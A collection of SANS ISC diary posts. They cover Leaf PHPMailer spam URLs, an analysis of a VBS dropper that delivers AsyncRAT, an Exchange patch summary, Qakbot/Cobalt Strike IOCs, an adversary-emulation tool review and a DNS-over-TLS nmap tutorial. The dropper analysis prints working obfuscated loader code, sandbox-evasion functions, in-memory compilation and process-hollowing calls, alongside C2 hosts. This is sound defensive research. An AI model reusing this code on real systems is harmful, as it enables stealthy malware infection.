hxxps://www[.]sementesvivas[.]bio/modules/jmsslider/views/img/layers/leafmailer2[.]8[.]php
hxxp://143[.]110[.]155[.]129/
hxxps://casing-china[.]com/wp-admin/leaf[.]php
hxxp://grma[.]9lj[.]ru/
hxxps://ipv6[.]lekkeropdemet[.]be/ibasao/l[.]php
hxxp://ow[.]ly/9t8W50DzlZG
hxxp://siquerida[.]com/ajtro/system/PHPMailer/language
hxxps://tinyurl[.]com/y4zbkzja
hxxps://anandlagad[.]com/how-to-send-email-using-phpmailer-and-gmail-with-example/
hxxp://www[.]asc925[.]com/leafmailer2[.]8[.]php
hxxp://solusitoilet[.]com/xz/leafmailer2[.]7[.]php
hxxps://mckinleywashstand[.]com/leafmailer2[.]8[.]php
hxxp://chase-online[.]ddnsking[.]com/
hxxps://smyankton[.]com/leaf[.]php
hxxps://m12tatar[.]ru/wp-admin/leafmailer2[.]8[.]php
hxxp://rnd[.]com[.]mx/wp-content/plugins/RootSaul/block[.]php
hxxp://is01[.]cba[.]edu[.]kw/old/wptest/wp-content/themes/xzbvsjrmhd[.]php?pass=xptasztqzd
hxxp://www[.]assostone[.]com/11[.]php
hxxps://pastebin[.]com/5igVDBVT
hxxp://sanrosindia[.]com/admin_2016/library/phpmailer
hxxp://www[.]ilendglobal[.]com/PHPMailer/
hxxps://elite11[.]in/public/site/image/slider/leafmailer2[.]8[.]php
hxxp://phpmailer[.]github[.]io/PHPMailer/
hxxps://legalhackers[.]com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC[.]html
hxxps://legalhackers[.]com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln[.]html
hxxps://github[.]com/opsxcq/exploit-CVE-2016-10033
hxxps://t[.]co/LMf3TIcdmy
hxxps://rfr[.]bz/t1jy3sp
hxxps://blog[.]sucuri[.]net/2021/01/phishing-malspam-with-leaf-phpmailer[.]html?utm_source=twitter&utm_medium=social&utm_campaign=en-us_sec_social_prd_awa_us_x_001
hxxp://sucur[.]it/3qXbEMS
hxxps://blog[.]sucuri[.]net/2021/01/phishing-malspam-with-leaf-phpmailer[.]html
hxxp://www[.]erbilen[.]net/phpmailer-sinifi-ile-gmail-uzerinden-e-posta-gonderimi/
hxxp://rpa-seminar-shinagawa[.]oni-nagoya[.]co[.]jp/wp-content/plugins/leafmails[.]php
hxxps://t[.]co/vXgBEIippr
hxxps://emboutsdetalons[.]com/
hxxp://www[.]qurankipukar[.]com/en/
hxxp://github[.]com/PHPMailer/PHPMailer
hxxps://dummyscodes[.]blogspot[.]com/2014/08/php-send-mail-with-xampp-localhost[.]html
hxxps://pseudonymousone[.]com/leafmailer[.]php
hxxp://vulapps[.]evalbug[.]com/w_wordpress_6/
hxxps://estacaoblumenau[.]com[.]br/leaf[.]php
hxxp://vitamfoundation[.]org/luckk[.]php
hxxps://phpmailer[.]en[.]softonic[.]com/
hxxps://unicrditalia[.]com/
hxxp://unicrditalia[.]com/
hxxp://cbdmover[.]com[.]au/calculate-your-move/phpmailer/
hxxp://52[.]42[.]241[.]167/PHPMailer-master/vendor/guzzlehxxp/guzzle/src/Exception
hxxp://shiyarajewells[.]com/img/portfolio/leafmailer2[.]8[.]php
hxxps://www[.]cdxy[.]me/?p=765
hxxp://warriorwealthsolutions[.]com/wp-admin/wp-config[.]php
hxxp://mislayer[.]egloos[.]com/1509382
hxxps://phpmailer[.]github[.]io/PHPMailer/classes/PHPMailer[.]PHPMailer[.]PHPMailer[.]html
hxxp://espaciosdeinnovacion[.]udd[.]cl/leaf[.]php
hxxp://siquerida[.]com/ajtro/system/PHPMailer/docs
hxxp://siquerida[.]com/ajtro/system/PHPMailer
hxxp://dedikodudunyasi[.]com/
hxxps://alchemicclasses[.]com/
hxxp://www[.]willalooka[.]com[.]au/wp-content/plugins/sdwffdy/leafmailer2[.]8[.]php
hxxps://phpmailer[.]github[.]io/PHPMailer/classes/PHPMailer[.]PHPMailer[.]POP3[.]html
hxxps://ranaunique[.]com/hato-old/vendor/phpmailer/phpmailer/language/
hxxps://www[.]websapex[.]com/blog/tutorial/php/send-an-email-through-html-form-using-phpmailer-in-php/
hxxp://rpa-seminar-shinagawa[.]oni-nagoya[.]co[.]jp/wp-content/plugins/leaf[.]php
hxxps://owlmailer[.]io/
hxxp://phpmailer[.]worxware[.]com/critique-avengers-endgame-streaming/
hxxp://labanquepostale623662s7[.]betaforge[.]it/
hxxps://sech[.]cl/wp-includes/rand/leafmailer[.]php
hxxp://unionbankonline[.]light-nutrition[.]com/leafmailer2[.]8[.]php
hxxps://zaimcraft[.]ru/
hxxps://account-login-inc[.]com/wp-admin/ky-verification/leafmailer2[.]8%20(1)[.]php?emailfilter=on
hxxp://caudan-vous-accueille[.]com/images/gmapfp/hsfgdyfy[.]php?pass=kod3
hxxp://mailqwerty[.]xyz/
hxxp://www[.]thaimartin[.]co/aku/pro[.]php
hxxp://wonodds[.]club/wp-content/plugins/qohdbjl/classic[.]php
hxxps://uni-leipzig[.]email/leaf[.]php?emailfilter=on
hxxp://theqwrqwry[.]com/leafmailer2[.]8[.]php?emailfilter=on
hxxps://dduuwwc[.]com/1[.]php?emailfilter=on
hxxp://hghfhgfhs[.]com/1[.]php?emailfilter=on
hxxps://adggnbbvns[.]com/leafmailer2[.]8[.]php?emailfilter=on
hxxp://galaxysystemsgroup[.]com/1[.]php?emailfilter=on
hxxps://freesolos[.]club/inc/PHPMailer/test_script
hxxps://github[.]com/Synchro/PHPMailer/
hxxp://envision-media[.]co/wp-includes/js/jcrop/leafup[.]php?pass=0112255
hxxp://www[.]netsisantalya[.]com/wp-content/themes/skand/lhcqyhebrt[.]php?pass=nsgonwmful

Many of them are compromised websites where the mailer is deployed and used to send spam.

Conclusion: Keep an eye on your bounced messages, sometimes they may reveal interesting information!

[1] https://en.wikipedia.org/wiki/Sender_Policy_Framework
[2] https://en.wikipedia.org/wiki/DomainKeys_Identified_Mail
[3] https://leafmailer.pw
[4] https://urlscan.io/result/3289f4f9-6db2-46e8-b72b-fa3b1561bdf6/related/

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

VBS files are interesting to deliver malicious content to a victim's computer because they look like simple text files. I found an interesting sample that behaves like a dropper. But it looks also like Russian dolls seeing all the techniques used to drop a RAT at the end. The file hash is 8697dc74d7c07583f24488926fc6e117975f8a9f014972073d19a5e62d248ead and has a VT score of 12/59[1]. It was delivered by email under the name "Procurement - Attached RFQ 202102.vbs". If you filter attachments based on the MIME type, this file won't be detected as suspicious:

remnux@remnux:/MalwareZoo/20210303$ file *.vbs
Procurement - Attached RFQ 202102.vbs: ASCII text, with very long lines, with CRLF line terminators

When you try to open a .vbs file on a standard Windows system, it is processed by the "Microsoft ® Windows Based Script Host" handlers. Here is the code executed when you open this script:

Private Function vQ(Inp, Key, Mode)
    Dim z, i, Position, cptZahl, orgZahl, keyZahl, cptString
    For i = 1 To lEn(Inp)
        Position = Position + 1
        If Position > lEn(Key) Then Position = 1
        keyZahl = aSc(Mid(Key, Position, 1))
        If Mode Then  
            orgZahl = aSc(Mid(Inp, i, 1))
            cptZahl = orgZahl Xor keyZahl
            cptString = hEx(cptZahl)
            If lEn(cptString) < 2 Then cptString = "0" & cptString
            z = z & cptString  
        Else  
            If i > lEn(Inp) \ 2 Then Exit For
            cptZahl = CByte("&" & "H" & Mid(Inp, i * 2 - 1, 2))
            orgZahl = cptZahl Xor keyZahl
            z = z & cHR(orgZahl)
        End If
    Next
    vQ = z
End Function

Dim AqUhNbgAqwpMb
AqUhNbgAqwpMb = "31562B0462222C4B781D323A2D1E1D4A2C4C39202E190F14112E3A1E0C432A5A454C1D392A1D1B5127260F22381E3D086E011F012E5B451B3F594B23031B217726535F5863201340205A593D28000E59003C3F173249335C144C493D4B234509370B044D5072585B17233B5F24703426190F7F363A1E2C2609173F552B09244B5C3E6C7D195D23136E015E2C501F0E5A453E314C34493D28331E507B394603242E526226063C291E0C08134726227F447D72334A3C1D3158532D3C4C7E754425390E0D7841200A0F0F03316A26505E3A413119576F141679085C2D5551445420325134502C1C1E5C0B153D131E3E41505D7303180A7F1F1F7D0E2D733E03126F215C7B794641334B58766C1A567E515B78093F0E0A540E7908027F05166B241E681C5379264B... (remaining bytes removed)

Dim SH
SH = cHR(80 + 7) & cHR(100 + 15) & cHR(66 + 1) & cHR(80 + 2) & cHR(110 - 5) & cHR(85 - 5) & cHR(80 + 4) & cHR(40 + 6) & cHR(230 / 2) & cHR(36 * 2) & cHR(60 + 9) & cHR(100 + 8) & cHR(70 + 6)
Set WS = CreateObject(SH)
Set FSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = FSO.CreateTextFile(FSO.GetSpecialFolder(2) + "\OS64Bits.PS1", True)
MyFile.WriteLine(rEPlAcE(vQ(AqUhNbgAqwpMb, "p2O)6[\.X0sI^{p(@5wAC|/Gh]N{am}3+(rNY3]>UK|/2_YlCUfqK{hZL*.NawX9G>:x.I", False), "%VBS%", wscript.SCRIPTFULLNAME))
MyFile.Close
WS.rUN "POWERSHELL -eXEcUTiONpOLicY rEmOtEsIgNeD -FILE " & FSO.GetSpecialFolder(2) + "\OS64Bits.PS1", 0

The payload is stored in AqUhNbgAqwpMb and decoded by the vQ().This function is an XOR-decoder using a muli-bytes key. The decoded payload is dropped on the filesystem (C:\Users\<user>\AppData\Local\Temp\OS64Bits.PS1) and executed by PowerShell. This script looks interesting at multiple points.

First, most suspicious strings are obfuscated and binary encoded. Decoding is performed via a specific function:

Function Binary2String([String] $data) {
    $byteList = [System.Collections.Generic.List[Byte]]::new()
    for ($i = 0; $i -lt $data.Length; $i +=8) {
        $byteList.Add([Convert]::ToByte($data.Substring($i, 8), 2))
    }
    return [System.Text.Encoding]::ASCII.GetString($byteList.ToArray())
}

There is a detection mechanism of virtual environments:

Function VirtualMachineDetector() {
    $searcher = (New-Object System.Management.ManagementObjectSearcher(Select * from Win32_ComputerSystem))
    $items = $searcher.Get()
    $Tr = ""
    foreach ($item in $items) {
        [String] $manufacturer = $item["Manufacturer"].ToString().ToLower()
        if (($manufacturer -eq "microsoft corporation" -and \
           $item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) -or \
           $manufacturer.Contains("vmware") -or $item["Model"].ToString() -eq "VirtualBox") {
             $Tr = "True"
        } else {
             $Tr = "False"
        }
     }
     return $Tr
}

Note also the presence of a function to detect Sandboxie[2], another sandbox tool that is easy to spot by tracking the DLL SbieDll.dll:

Function DetectSandboxie() {
    [Int32] $i = ModuleHandle("SbieDll.dll")
    [String] $s = ""
    if ($i -eq 0) {
        $s = "False"
    } else {
        $s = "True"
    }
    return $s
}

 The most interesting function is CodeDom. It invokes the CSharp compiler to compile the next payload:

function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {
    $dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'
    $dictionary.Add(("CompilerVersion"), ("v4.0"))
    $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)
    $CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters
    $CompilerParametres.ReferencedAssemblies.Add(("System.dll"))
    $CompilerParametres.ReferencedAssemblies.Add(("System.Management.dll))
    $CompilerParametres.ReferencedAssemblies.Add(("System.Windows.Forms.dll"))
    $CompilerParametres.ReferencedAssemblies.Add(("mscorlib.dll"))
    $CompilerParametres.ReferencedAssemblies.Add(("Microsoft.VisualBasic.dll"))
    $CompilerParametres.IncludeDebugInformation = $false
    $CompilerParametres.GenerateExecutable = $false
    $CompilerParametres.GenerateInMemory = $true
    $CompilerParametres.CompilerOptions += ("/platform:X86 /unsafe /target:library")

    $BB = Decompress($BB)

    [System.CodeDom.Compiler.CompilerResults] $CompilerResults = \
       $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, \
       [System.Text.Encoding]::Default.GetString($BB))

    [Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)

    [Byte[]] $Bytes =  Decompress(@( \
      31,139,8,0,0,0,0,0,4,0,180,189,7,124,92,213,149,63,126,231,77,213,168,206,168,203,18,150,139,204,216, \
      198,178,138,37,75,6,131,213,45,219,178,213,108,75,14,193,140,164,145,52,246,72,79,158,25,201,150,13, \
      142,197,2,129,36,180,116,88,146,80,194,166,146,132,36,155,182,41,56,
      (bytes removed)
      61,237,1,92,113,253,243,0,180,0,0))

    try {
        [String] $MyPt = \
        [System.IO.Path]::Combine([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory(),\
         "InstallUtil.exe")
        [Object[]] $Params=@($MyPt.Replace("Framework64","Framework") ,$Bytes)
        return $T.GetMethod($MT).Invoke($null, $Params)
    } catch { }
}

The CSharp code is located in the variable BB (I posted the code on Pastebin[3]). By having a look at the code, we can see a bunch of interesting API calls:

private static readonly DelegateVirtualAllocEx VirtualAllocEx = LoadApi<DelegateVirtualAllocEx>(ReverseString(Kernel32), ReverseString(VirtualAllcEx)); 
private static readonly DelegateWriteProcessMemory WriteProcessMemory = LoadApi<DelegateWriteProcessMemory>(ReverseString(Kernel32), ReverseString(WriteProcessMem)); 
private static readonly DelegateReadProcessMemory ReadProcessMemory = LoadApi<DelegateReadProcessMemory>(ReverseString(Kernel32), ReverseString(ReadProcessMem)); 
private static readonly DelegateZwUnmapViewOfSection ZwUnmapViewOfSection = LoadApi<DelegateZwUnmapViewOfSection>(ReverseString(ntdll), ReverseString(ZwUnmapViewOfSec)); 
private static readonly DelegateCreateProcessA CreateProcessA = LoadApi<DelegateCreateProcessA>(ReverseString(Kernel32), ReverseString(CreateProcA));

This clearly indicates that process hollowing is used to replace the code of a legit process with malicious code. This code is located in the variable Bytes and is a PE file (SHA256:D452CEE94E3A2D58B05E9F62A4AA4004C0632D9B56FA8B57664D295BC88C4DF0) that tries to communicate with a C2 server located at asin8989.ddns.net on port 8989. The malware belongs to the AsyncRat[4] family. 

Note: My advice to protect yourself against such malicious .vbs file is to replace the default app to open them with notepad.exe. 

[1] https://www.virustotal.com/gui/file/8697dc74d7c07583f24488926fc6e117975f8a9f014972073d19a5e62d248ead/detection
[2] https://github.com/sandboxie-plus/sandboxie
[3] https://pastebin.com/cW25WEpY
[4] https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Microsoft today released an emergency patch for Microsoft Exchange Server. The patch fixes seven different vulnerabilities. Four of these vulnerabilities are currently being used in targeted attacks.

Quick Summary / What you need to do:

1. Verify that you are not already compromised. Microsoft has some indicators here.
2. Patch. But currently, the patch is only available if you applied recent updates. So you may have to apply them first if you are behind. See the first table below for details.
3. Review your Exchange Server configuration. Microsoft has tips here.

The attacks gain access via a Server Side Request Forgery (SSRF) vulnerability. Exploiting this vulnerability requires access to port 443. This vulnerability can be used to trick the Exchange server to send requests essentially to itself, bypassing authentication. This will give access to an insecure deserialization vulnerability that can be leveraged to execute arbitrary code as SYSTEM. Finally, two file upload vulnerabilities are used to upload files to the system.

Microsoft observed the attackers uploading web shells for persistent access and exfiltrating credentials and email from affected servers.

Microsoft currently only makes patches available for the exact versions listed below in the "Patch Available For" column. You will first need to apply the respective RU/CU before applying today's patch.

Version	Vulnerable	Patch Available For
Exchange Server 2010	no	2010 RU 31 for SP 3 (defense-in-depth update) KB5000978
Exchange Server 2013	yes	2013 CU 23 (KB5000871)
Exchange Server 2016	yes	2016 CU 19 CU 18 (KB5000871)
Exchange Server 2019	yes	CU 8 CU 7 (KB5000871)

 

March 2, 2021 Exchange Emergency Patch Summary.

Description
CVE	Disclosed	Exploited	Exploitability (old versions)	current version	Severity	CVSS Base (AVG)	CVSS Temporal (AVG)
Microsoft Exchange Server Remote Code Execution Vulnerability
%%cve:2021-26412%%	No	No	Less Likely	Less Likely	Critical	9.1	8.2
%%cve:2021-26854%%	No	No	Less Likely	Less Likely	Important	6.6	5.8
%%cve:2021-26855%%	No	Yes	Detected	Detected	Critical	9.1	8.4
%%cve:2021-26857%%	No	Yes	More Likely	Detected	Critical	7.8	7.2
%%cve:2021-26858%%	No	Yes	Detected	Detected	Important	7.8	7.2
%%cve:2021-27065%%	No	Yes	Detected	Detected	Critical	7.8	7.2
%%cve:2021-27078%%	No	No	Less Likely	Less Likely	Important	9.1	8.2

Related Microsoft Posts:

HAFNIUM targeting Exchange Servers with 0-day exploits
Multiple Security Updates Released for Exchange Server
Released: March 2021 Exchange Server Security Updates
Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: March 2, 2021 (KB5000871)
Description of the security update for Microsoft Exchange Server 2010 Service Pack 3: March 2, 2021 (KB5000978)

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

Introduction

On Tuesday 2021-03-02, I generated a Qakbot (Qbot) infection on a Windows host in one of my Active Directory (AD) test environments, where I saw Cobalt Strike as follow-up activity.  I've seen Cobalt Strike from Qakbot infections before.  Below are two that I documented in December 2020.

• https://www.malware-traffic-analysis.net/2020/12/07/index.html
• https://www.malware-traffic-analysis.net/2020/12/15/index.html

I haven't documented one for the ISC yet, so today's diary reviews my Qakbot infection with Cobalt Strike seen on Tuesday 2021-03-02.

Shown above:  Flow chart for the Qakbot infection with Cobalt Strike from Tuesday 2021-03-02.

Images

Shown above:  Spreadsheet extracted from a zip archive attached to malspam pushing Qakbot.

Shown above:  Traffic from the infection filtered in Wireshark (image 1 of 3).

Shown above:  Traffic from the infection filtered in Wireshark (image 2 of 3).

Shown above:  Traffic from the infection filtered in Wireshark (image 3 of 3).

Shown above:  Initial DLL saved a the victim's Windows host.

Shown above:  Artifact saved to disk during the Qakbot infection.

Shown above:  Registry updates caused by Qakbot.

Indicators of Compromise (IOCs)

Malware from the infected Windows host:

SHA256 hash: 16a0c2f741a14c423b7abe293e26f711fdb984fc52064982d874bf310c520b12

• File size: 87,552 bytes
• File name: document-1955896638.xls
• File description: Excel spreadsheet with macro for Qakbot (Qbot)
• Any.Run analysis: https://app.any.run/tasks/713d7a1f-6905-4ddd-92e4-84c0bbc97f89
• Cape analysis: https://capesandbox.com/analysis/121176/
• Triage analysis: https://tria.ge/210302-1lphqmv2px

SHA256 hash: 24753d9f0d691b6d582da3e301b98f75abbdb5382bb871ee00713c5029c56d44

• File size: 434,744 bytes
• File location: hxxp://kfzhm28pwzrlk02bmjy[.]com/mrch.gif
• File location: C:\Users\[username]\IEUDLK.CJF
• File description: Initial DLL for Qakbot (Qbot) retrieved by Excel macro
• Any.Run analysis: https://app.any.run/tasks/957a9919-b411-4724-b49f-8c9a1a4c95ab
• Cape analysis: https://capesandbox.com/analysis/120925/
• Triage analysis: https://tria.ge/210302-y9rqfzcq5x

Traffic to retrieve the initial Qakbot DLL:

• 8.209.64[.]96 port 80 - kfzhm28pwzrlk02bmjy[.]com - GET /mrch.gif

Qakbot C2 traffic:

• 207.246.77[.]75 port 995 - HTTPS traffic

Cobalt Strike traffic:

• 45.144.29[.]185 port 443 - HTTPS traffic
• 45.144.29[.]185 port 443 - logon.securewindows[.]xyz - HTTPS traffic
• 45.144.29[.]185 port 8080 - 45.144.29[.]185:8080 - GET /WjSH
• 45.144.29[.]185 port 8080 - logon.securewindows[.]xyz:8080 - GET /cx
• 45.144.29[.]185 port 8080 - 45.144.29[.]185:8080 - GET /en_US/all.js
• 45.144.29[.]185 port 8080 - 45.144.29[.]185:8080 - POST /submit.php?id=248927919

Final words

A pcap of the infection traffic and the associated malware can be found here.

---

Brad Duncan
brad [at] malware-traffic-analysis.net

One of the best ways to test your detection portfolio is to emulate user actions on monitored systems.

I spotted Sim via Twitter and was immediately intrigued as I advocate strongly for any tools and features that enable configurable adversary emulation. Adversary emulation enables blue teams to validate and optimize their detection portfolio and thus determine the true efficacy of their detective capabilities. I do not consider any detection that has not been tested via direct purple or red team engagement, or via automated adversary emulation, as production ready. Per her GitHub repo, Hope Walker’s Sim is a C# application, configured via an XML file, that performs tasks based on the configuration to resemble user actions on a system in order to facilitate training and education. As a long time SOC and DFIR manager, training for me includes “training” detection and models to ensure optimal performance. IceMoonHSV’s projects appear to be fairly recent contributions to our community, I applaud Hope’s work here and offer a hearty welcome.

Again, referring to her repo content, user actions can be scripted using the task block in an XML configuration file where tasks are comprised of two components:

• Task configuration: three configuration tags determine the name of the task (for error tracing and configuration), the number of times the task will <loop>, and how long to <pause> between each action.
• Task actions: Many actions can be configured but it is recommended to maintain task granularity for more narrow, specified testing. Create multiple, scenario based config files, and run individual tests instead. Sim execute <actions> as part of user simulation. Sim performs each action as if scripted, executing one action after the other in sequential order. Sim does not wait for one action to complete before starting another, thus the importance of the <pause> and <sleep> tags.

Read the rest of Hope’s documentation for yourselves, there are plenty of details as to action configurations including <setclipboard>, <getclipboard>, and <plain> for plain text typed as if a user typing sequentially. There are numerous special key options as well as the ability to call executables via <process> and run PowerShell commands with <powershell>.

I built Sim in Visual Studio; it’s posted to GitHub as a source-only project but with a solution file so compiling your own sim.exe is quick and easy. I also created a copy of the admindemo.xml file found in XMLExamples, saved it as sim_toolsmith_demo.xml and made some tweaks to create a more adversarial user.
I’ve shared my modifications for your use and consideration as a Gist.

Calling my demo file with sim.exe is as easy as Sim.exe sim_toolsmith_demo.xml (unique to your file structure) at an admin command prompt.

Figure 1: Sim with actions config file

Rather than talk about it, I captured a video to exhibit Sim’s run through my adversarial user configuration file. Imagine this adversary as a script kiddie who has popped a system and is now searching for hacker tools to expand terrain. You’ll note PowerShell calls as well as command prompt actions. Actions also include Google searches, including multiple browser tabs, as well as keyboard tabs to land on desired search content. This config also saves the Windows Security event log, noteworthy because it could just as easily have cleared it, which should always trigger an alert.

Sim demo video

As you can see, Sim does a great job of emulating user behaviors, and can easily be configured to conduct far more adversarial behaviors as desired. This particular demonstration would likely trigger alerts for web filtering rules intended to block access to hacker tools. Detections that make use of PowerShell logging could certainly be easily tested here as well. And again, if the Security event log had been cleared instead of simply written off to a file, any detection rules or signatures monitoring the 1100 series of Windows Event Logs would have triggered, particularly Event ID 1102 - The audit log was cleared.
I assert that Sim could be batched and automated. You could deploy an entire range of adversary emulations to a central share then call a master file during a desired and scheduled test or emulation window. Group Policy is even an option. Obviously, it is not recommended to fire off Sim jobs designed to emulate adversarial behavior without working with your leadership and any teams who may be monitoring user behaviors. Much like penetration testing, definitely ask for written permission rather than forgiveness after the fact.
I hope Hope will keep developing against this project, the possibilities are endless for adversary emulation scenarios, end Sim is really light and highly flexible. It’s great work, please safely give it a go for yourselves!

Cheers…until next time.

Russ McRee | @holisticinfosec

Going back a few weeks, we discussed how DNS over HTTPS (DoH) works (https://isc.sans.edu/forums/diary/Fun+with+NMAP+NSE+Scripts+and+DOH+DNS+over+HTTPS/27026/)  - very much as an unauthenticated API over HTTPS.  But DNS over TLS (DoT) has been with us for a fair bit longer (May 2016), why haven't we heard about it so much?

After wrestling with it for a bit, I can tell you why!

DoH is easy to work with, since we have so many HTTPS tools at our disposal.  Plus DoH was first implemented in browsers, and the browser developers *live* in HTTPS, so DoH is a cake-walk for them.  DNSSEC is basically plain old unencrypted DNS, but with signature records.

DoT on the other hand is a whole 'nother beast.  It's still basic DNS, but encapsulated in TLS.  So to make DoT calls we need a toolset to create TLS packets, then send and validate them using the certificate at the server side.  So the first tool that came to my mind of course was scapy, but read on, I used an easier method ..

To allow all of the mentioned DNS protocols to live on one server, DoT lives on tcp/853.  This makes for an easy NMAP scan if you're looking for this service.  NMAP tags the port correctly, but an NMAP version scan (-sV) won't identify  the DoT service.  It will however find some critical strings in the fingerprint, things like "DNSVersionBindReqTCP" and "DNSStatusRequestTCP" - so a version scan will validate the service enough for your eyes to see it, without calling it out definitively.  You can also of course validate the certificate on port tcp/853 using NMAP's ssl-cert.nse script or openssl:

nmap -p853 --script ssl-cert 8.8.8.8 Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-01 07:55 Eastern Standard Time Nmap scan report for 8.8.8.8 Host is up (0.012s latency).   PORT    STATE SERVICE 853/tcp open  domain-s | ssl-cert: Subject: commonName=dns.google/organizationName=Google LLC/stateOrProvinceName=California/countryName=US | Subject Alternative Name: DNS:dns.google, DNS:*.dns.google.com, DNS:8888.google, DNS:dns.google.com, DNS:dns64.dns.google, IP Address:2001:4860:4860:0:0:0:0:64, IP Address:2001:4860:4860:0:0:0:0:6464, IP Address:2001:4860:4860:0:0:0:0:8844, IP Address:2001:4860:4860:0:0:0:0:8888, IP Address:8.8.4.4, IP Address:8.8.8.8 | Issuer: commonName=GTS CA 1O1/organizationName=Google Trust Services/countryName=US | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-01-26T08:54:07 | Not valid after:  2021-04-20T08:54:06 | MD5:   9edd 82e5 5661 89c0 13a5 cced e040 c76d |_SHA-1: 2e80 c54b 0c55 f8ad 3d61 f9ae af43 e70c 1e67 fafd Nmap done: 1 IP address (1 host up) scanned in 24.43 seconds

Me, I took the easy way out for DoT queries and installed the knot-dnsutils (sudo apt-get install knot-dnsutils), which installs kdig to do all the heavy lifting for me.  As the name implies, kdig does just about everything that dig does, but for this task gives you parameters to make DoT queries.

So an A record query over DoT from kdig looks just very much like DOS query outpuyt from dig:

$ kdig @dns.google.com +tls-ca  isc.sans.edu A ;; TLS session (TLS1.3)-(ECDHE-X25519)-(RSA-PSS-RSAE-SHA256)-(AES-256-GCM) ;; ->>HEADER<<- opcode: QUERY; status: NOERROR; id: 57540 ;; Flags: qr rd ra; QUERY: 1; ANSWER: 2; AUTHORITY: 0; ADDITIONAL: 1   ;; EDNS PSEUDOSECTION: ;; Version: 0; flags: ; UDP size: 512 B; ext-rcode: NOERROR ;; PADDING: 391 B ;; QUESTION SECTION: ;; isc.sans.edu.                IN      A ;; ANSWER SECTION: isc.sans.edu.           4       IN      A       45.60.103.34 isc.sans.edu.           4       IN      A       45.60.31.34   ;; Received 468 B ;; Time 2021-03-01 04:58:51 PST ;; From 8.8.8.8@853(TCP) in 38.9 ms

Note all the TLS session info at the top, and the port number in the last line.

As you'd expect, if you're just after answers you can use the +short parameter:

# kdig @dns.google.com +tls-ca +short www.coherentsecurity.com AAAA robvandenbrink.github.io.

.. yup, I host my website on github, handiest github feature ever (ok, maybe not the handiest, but still pretty darned handy)

Other handy parameters in kdig?

• Just as in dig, you can always tack on the "-d" parameter for debug output
• +tls-hostname can be used to over-ride the server name during TLS negotiation.  This means you can even use the server's IP address when you use this parameter.
• Related to tls-hostname, +tls-sni adds the Server Name Indication field to the request

Without constructing the TLS packet, how can I use DoT in an NMAP script?  I again took the easy way out and used kdig, in combination with the lua command os.execute.  Yup, in the time honoured tradition of coding laziness I shelled out and executed the matching OS command!  In the DoH script I wrote I did a quick check to make sure that the host was running HTTP services on port 443 with "shortport.http".  In the DoT script I changed this, to ensure that TLS is running on the scanned port, using the "shortport.ssl" check.  An example scan is shown below:

$ nmap -p853 --script dns-dot.nse 8.8.8.8 --script-args target=www.cisco.com,query=AAAA Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-01 05:13 PST Nmap scan report for dns.google (8.8.8.8) Host is up (0.017s latency).   PORT    STATE SERVICE 853/tcp open  domain-s | dns-dot: |   www.cisco.com.akadns.net. |   wwwds.cisco.com.edgekey.net. |   wwwds.cisco.com.edgekey.net.globalredir.akadns.net. |   e2867.dsca.akamaiedge.net. |   2607:f798:d04:189::b33 |_  2607:f798:d04:191::b33   Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

You can find the DoT script here: https://github.com/robvandenbrink/dns-dot . Because is calls kdig, you'll need the knot-dnsutils package installed before this script will run.  If you're interested in combining NMAP scans with different OS commands you're welcome to review the source code and use whatever you need!

Do you have a handy nmap script that uses os.execute to do the "behind the scenes" work?  Please, share a link in our comment form!

 

References:
DoT RFD: https://tools.ietf.org/html/rfc7858

Usage Profiles for DNS over TLS and DNS over DTLS: https://tools.ietf.org/html/rfc8310

knot-dnsutils: https://www.knot-dns.cz/

 

===============
Rob VandenBrink
rob<at>coherentsecurity.com